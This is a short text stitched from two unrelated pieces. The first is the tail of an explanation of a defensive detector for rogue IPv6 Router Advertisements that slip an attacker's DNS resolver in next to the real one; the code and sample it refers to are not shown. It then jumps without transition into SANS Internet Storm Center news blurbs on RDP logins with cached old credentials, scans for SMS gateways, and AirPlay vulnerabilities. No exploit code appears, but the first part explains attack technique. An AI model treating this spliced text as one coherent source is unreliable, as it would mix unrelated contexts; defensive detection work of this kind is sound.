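In production the payload comes from a raw ICMPv6 socket or a pcap; the parser deliberately rejects zero-length and truncated options rather than skipping them, because a malformed RA is itself worth an alert. The rogue RA in the sample keeps the real resolver alongside the attacker's so resolution keeps working for the victim, which is the point of the technique and why the check compares every advertised server rather than just the first. RA Guard on the access switches (RFC 6105) prevents the injection outright; this is the compensating detection where that is not available.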
Windows RDP Access is Possible with Old Credentials
Credential caching may lead to Windows allowing RDP logins with old credentials.
Internet Storm Center StormCast Wednesday, April 30, 2025
SMS Attacks; Apple Airplay Vulnerabilities
https://isc.sans.edu/podcastdetail/9430
More Scans for SMS Gateways and APIs
Attackers are not just looking for SMS Gateways like the scans we reported on last week, but they are also actively scanning for other ways to use APIs and add on tools to send messages using other people’s credentials.
https://isc.sans.edu/diary/More+Scans+for+SMS+Gateways+and+APIs/31902
AirBorne: AirPlay Vulnerabilities
Researchers at Oligo revealed over 20 weaknesses they found in Apple’s implementation of the AirPlay protocol. These vulnerabilities can be abused to execute code or launch denial-of-service attacks against affected devices. Apple patched the vulnerabilities in recent updates.